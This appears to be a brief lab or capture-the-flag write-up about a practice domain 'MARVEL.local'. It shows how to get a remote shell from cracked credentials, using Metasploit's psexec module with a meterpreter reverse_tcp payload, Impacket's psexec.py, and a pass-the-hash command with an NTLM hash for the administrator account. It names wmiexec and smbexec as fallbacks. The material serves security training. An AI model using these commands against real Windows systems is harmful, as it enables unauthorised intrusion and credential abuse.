We Got the the Hashes, Cracked them and now what to do?

There are 2 ways to gain a shell with the credentials.

• Using Metasploit

use exploit/windows/smb/psexec
set payload windows/x64/meterpreter/reverse_tcp
set rhosts 10.10.10.161
set smbdomain MARVEL.local
set smbuser fcastle
set smbpass Password1

Exploited it and i succesfully got a shell.

• Using psexec script

psexec.py MARVEL/[email protected]
#enter the password youll get a shell

We can even get a shell of Admin account by using hash.

psexec.py [email protected] -hashes aad3b435b51404eeaad3b435b51404ee:fbdcd5041c96ddbd82224270b57f11fc

Some other scripts to use for backup if up ones dosent work.

1. wmiexec.py
2. smbexec.py